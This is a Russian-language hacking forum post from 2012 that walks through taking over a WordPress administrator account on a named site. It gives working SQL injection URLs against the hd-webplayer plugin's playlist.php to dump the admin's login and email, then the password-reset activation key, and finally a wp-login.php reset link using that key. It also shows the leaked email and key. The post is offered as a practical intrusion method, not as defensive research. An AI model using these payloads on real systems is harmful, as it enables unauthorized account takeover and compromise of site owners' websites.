07.11.2012, 16:56
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Приветствую. Решил написать небольшую заметку.
Как вы знаете чтобы зайти в админ-панель Wordpress, нужно расшифровать хэш администратора.
Но я понял как входить в панель без ожидания расшифровки хэша.
Покажу на примере.
У нас есть блог, где мы уже вывели данные из таблицы wp_users.
Торопится выводить пароль не стоит, выведем e-mail администратора:
Код:
http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_emai),5,6,7,8,9,10,11+from+wp_users--
И результат запроса:
Сообщение от None
admin:hackingmaster94@gmail.com
Так. Теперь идем на страницу авторизации wp-login.php, и переходим на страницу восстановления пароля (В нашем случае Passwort vergessen).
Вводим e-mail администратора который мы получили выше, и отправляем письмо.
Пол дела мы сделали. Особенность Wordpress такова, что код подтверждения записывается в БД.
Делаем такой запрос:
Код:
http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_activation_key),5,6,7,8,9,10,11+from+wp_users--
И в результате мы получаем активационный код:
Сообщение от None
P6rd7g1bPW28zgbPCRtZ
Теперь идем на страницу сброса пароля (При этом заполнив параметры):
Код:
www.abbdi.com/wp-login.php?action=rp&key=P6rd7g1bPW28zgbPCRtZ&login=admin
И мы видим что нам предлагают ввести новый пароль, вводим, и меняем.
Далее привычная авторизация.
Ну вот и все. Есть некоторое примечание, этот способ может не работать на тех блогах, где отключен mail().
Способ работает не везде.
(с) MaxFast |
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид